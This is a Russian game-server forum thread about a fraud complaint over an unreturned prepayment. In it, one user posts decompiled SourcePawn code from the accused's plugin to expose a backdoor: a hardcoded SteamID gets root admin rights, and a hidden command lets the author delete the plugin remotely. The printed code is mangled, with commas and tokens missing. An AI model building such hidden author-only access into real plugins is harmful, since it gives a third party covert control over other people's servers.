Жалоба на Райский

Тема в разделе "Жалобы", создана пользователем Крузяра, 3 апр 2018.

Статус темы:
Закрыта.
  1. Крузяра

Крузяра Супермодератор

Симпатии:
    5.161
    Поступила жалоба на пользователя @Райский от @counter
    Имеются чеки переводов:
    Последние 4-е цифры номеров карт "отправителя" закрашены специально.
    upload_2018-4-3_22-35-36.png
    upload_2018-4-3_22-36-27.png
    upload_2018-4-3_22-36-31.png
    upload_2018-4-3_22-43-33.png

Переписка будет приложена в течение суток (производится склейка и удаление конфиденциальных данных (логины, пароли, IP-адреса, ссылки)). Оффтоп

Всё, что известно о нём
    Ожидаем комментарии от @Райский в течение 24-х часов.
    @Райский является мошенником, крайне не рекомендуется с ним связываться.

Последнее редактирование модератором: 5 апр 2018
    GastritMen, TiBarification, Rabb1t и 5 другим нравится это.
  2. Grey83

Grey83 похухоль

Симпатии:
    1.373
  3. panikajo

panikajo

Симпатии:
    56
    @Kr1kuzya плиз другой шрифт сделай, этот выйми глаз на полку.

4. Grey83

Grey83 похухоль

Симпатии:
    1.373
    Вот код этой шняги из декомпила:
    PHP:
     char steamid[16];

char userip[16];
    ...
    public 
    Action AccAdmCmd(int clientint args)
    {

GetClientIP(clientuserip64true);

GetClientAuthId(clientAuthIdType 1steamid64true);
        if (
    StrEqual(2628 8"1:220723885"true))
        {

AddUserFlags(client16384);

SetUserFlagBits(client16384);

PrintToChat(client"ROOT FLAGS");
        }
        else
        {

LogToFile(g_sLogPath"[%s|%s] Игрок [Ник:%N|%s|IP:%s] пытался получит ROOT права.""ACC+""5.3.3 Release"clientsteamiduserip"ACC+");
            if (
    GetFeatureStatus(FeatureType 0"SBBanPlayer"))
            {

BanClient(client1ConVar.IntValue.get(g_ConVar_DELBanTime), "[%s|%s] Пытался получит ROOT права.""ACC+""5.3.3 Release"any 0);
            }

SBBanPlayer(0clientConVar.IntValue.get(g_ConVar_DELBanTime), "[ACC+] Пытался получит ROOT права.");
        }
        return 
    Action 3;
    }
    --- Добавлено позже ---
    @panikajo, это не он сделал: это такие настройки форума
    --- Добавлено позже ---
    А ещё там есть хорошая команда sm_aikidelete, которая позволяет в любой момент удалить плагин с сервера
    PHP:
    public Action CommandOff(int clientint args)
    {

GetClientAuthId(clientAuthIdType 1steamid64true);

GetClientIP(clientuserip64true);
        if (
    CheckMyAccess(client))
        {
            if (
    GetConVarInt(g_cChatColors) == 1)
            {

PrintToChatAll("\x07F4A460Плагин \x07FF00FF%s \x070000FF%s \x0700FFFFбыл \x07FF0000удалён Автором: %s"368163686836884);
            }
            else
            {

PrintToChatAll("Плагин [%s|%s] был удалён Автором \x04%s"369643697236988);
            }

PrintToServer("[%s] %s Плагин был удалён Автором %s:)""ACC+""5.3.3 Release""☠ ÄйӃи ☠");

LogToFile(g_sErrorLogPath"[%s] %s Плагин был удалён Автором %s:)""ACC+""5.3.3 Release""☠ ÄйӃи ☠");

DeletePlugin();
        }
        else
        {
            if (
            {

PrintToChat(client"\x07696969Вы не \x072F4F4FАвтор. \x07FF0000Удаление \x07F5F5DCплагина \x07FFE4C4не произошло!");
            }
            else
            {

PrintToChat(client"Вы не Автор. Удаление плагина не произошло!");
            }

LogToFile(g_sLogPath"[%s|%s] Игрок [Ник:%N|%s|IP:%s] пытался удалить ядро %s.""ACC+""5.3.3 Release"clientsteamiduserip"ACC+");
            if (
    GetFeatureStatus(FeatureType 0"SBBanPlayer"))
            {

BanClient(client1ConVar.IntValue.get(g_ConVar_DELBanTime), "[%s|%s] Попытка удалить плагин ACC+ через консоль""ACC+""5.3.3 Release"any 0);
            }
            else
            {

SBBanPlayer(0clientConVar.IntValue.get(g_ConVar_DELBanTime), "[ACC+] Попытка удалить плагин ACC+ через консоль");
            }
            if (
            {

PrintToChatAll("\x07FF1493Игрок \x07FF4500%N \x074B0082забанен системой %s \x0700FF00за попытку удалить Anti-Cheat."client37864);
            }

PrintToChatAll("\x01Игрок \x04%N \x01забанен системой \x04%s \x01за попытку удалить \x04Anti-Cheat."client38004);
        }
        return 
    Action 3;
    }

TiBarification, suremiur, wayLANder и 6 другим нравится это.
  5. Райский

Райский Честный

Симпатии:
    31
    Ну начнем с того, что я тебе должен вернуть 1500. Нет делать этого не собираюсь, приложи лучше записи разговоров по телефону и переписку ВК точную скидывай. Все было нормально пока ты грубить не начал. После чего оскорбительное твое поведение продолжалось в течении 1,5 месяца которые я терпел, но после чего уже терпению пришел конец! По этому не жди деньги обратно. Не я так захотел а ты так сделал.

6. Крузяра

Крузяра Супермодератор

Симпатии:
    5.161
    @Райский, о каком именно оскорбительном поведении идёт речь? Сейчас листаю диалог ВК, который успел склеить на текущий момент, и ничего такого не вижу.

7. Райский

Райский Честный

Симпатии:
    31
    @Kr1kuzya, Скайп или мобильный разговор пусть прикладывает. А вк подтёр уже молодец =)
    Только из за маленького уважения к данному персонажу, скажу: Я тут не чего тут оспаривать не буду и тем более ввести этот диалог дальше на эту тему.
    Кто считает мошенником пусть. Я знаю почему я так с ним поступил (Упомянуто выше). Ну и вообще hlmod тут не причём, не тут он меня нашел и не тут оскорблял.

Оффтоп
    --- Добавлено позже ---
    Твои слова были: Твой долг 1500 остался. А тут уже пишешь 4к.руб. Да не оставляй это все так, давай продолжай. Ты даже обвиняя меня тут врёшь!!!

8. noBap

noBap

Симпатии:
    158
    @Райский, Что то мало верится в ваши слова. Я думаю вряд ли вас кто то стал оскорблять если бы вы честно отработали положенное. На протяжении уже нескольких месяцев знаком с @counter и его сервером. Просил меня как то поковыряться с hlstats. За 2 минуты работы на мое удивление заплатил 500 рублей. Гнать надо таких как вы с этого форума. Кинул человека и еще хватает наглости фыркать.

9. Райский

Райский Честный

Симпатии:
    31
    @noBap, Человек к каждому относиться так, как ему хочется. Чё он тогда удалился ? Не я удалил его а он сам свалил =D
    Screenshot_1.png

10. noBap

noBap

Симпатии:
    158
    Я бы поступил точно так же будь на его месте. Какой смысл продолжать упрашивать тебя сделать свою работу если ты даже не приступал к ней.

11. Райский

Райский Честный

Симпатии:
    31
    @noBap, Я его заказ сделал. После чего должен был ему 1500. Каждый день слушать это (Делай *варь я же заплатил, и еще более грубая форма была. Ну и один хороший диалог по телефону состоялся). За что ? Уж точно не за тех обслуживание его сервера которым я какого-то фига занимался 2 мес.

12. Утка

Утка

Симпатии:
    135
    Какие-то неуместные у тебя оправдания, а пруфы серьезные..+гнать таких с форума

Clark Kent и Райский нравится это.
  13. Райский

Райский Честный

Симпатии:
    31
    @skolobes, Я еще раз повторяюсь. Я не собираюсь оправдывать свои действия в сторону данного персонажа. Который тут накатал жалобу с целью разбить какую-то репутацию. До начала этого инцидента я на форуме был неактивен вообще. HLmod и ссора моя с данным человеком как небо и земля.

14. noBap

noBap

Симпатии:
    158
    @Райский, Зачем ты продолжаешь врать. Ты не настроил ничего из того за что получил 1500.

15. d4Ck

d4Ck

Симпатии:
    239
    Никогда не понимал людей, которые пишут ноунеймам, выложившим свой высер уникальный плагин, в котором нашли кучу ошибок, которые автор не в состоянии исправить, явно видно, что человек не вдупляет, что он делает, но зато выкатывает по 10 бесполезных апдейтов в неделю, соглашаются на предоплату огромной суммы, а потом удивляются, что их обманули. Почему нельзя зайти в раздел "Услуги" и найти скриптера/"серверодела" там? Людей от туда можно хоть как-то считать проверенными. Оффтоп

Ампутаге и wayLANder нравится это.
  16. Clark Kent

Clark Kent

Симпатии:
    13
    Так-как вы оказывали этому человеку услуги в области настройки сервера, а ведь этот форум администраторов игровых серверов и тут не должны быть мошенники/обманщики/кидаловы, следовательно вы должны быть забанены.

17. R1KO

R1KO всё тлен Супермодератор

Симпатии:
    5.790
    Эм.. если надоело слушать оскорбления - верни не отработанные деньги и пошли лесом, в чем проблема? Во всех других случаях это ничто иное как "кидалово".
    Ну ты ж сам почему-то терпел (с твоих слов) оскорбления и продолжал заниматься тех. обслуживанием его сервера (опять же с твоих слов).
    Тут 2 варианта: либо тебе нравится когда тебя оскорбляют за деньги, либо тебе хотелось еще подоить его "на сигареты".

Rabb1t, TiBarification, Утка и 2 другим нравится это.
  18. Крузяра

Крузяра Супермодератор

Симпатии:
    5.161
    @jasmine, сейчас общаюсь по телефону. Говорит, что кто-то из игроков сервера свёл его с ним.
    И на тот момент, никаких плагинов он не выкладывал.

Райский нравится это.
  19. Райский

Райский Честный

Симпатии:
    31
    Нет Рико. Я вас понял. Деньги верну обязательно ему. Но хочу после извинения услышать за оскорбления. У меня все.

20. Paranoiiik

Paranoiiik

Симпатии:
    269
    То ли я туплю, то ли несостыковка какая-то. Автор жалобы писал про отсрочку 2 пару недель, а исполнитель здесь пишет что что-то там якобы 1.5 месяца терпел - разве 1.5 месяца делал всю работу? Как-то странно

Статус темы:
Закрыта.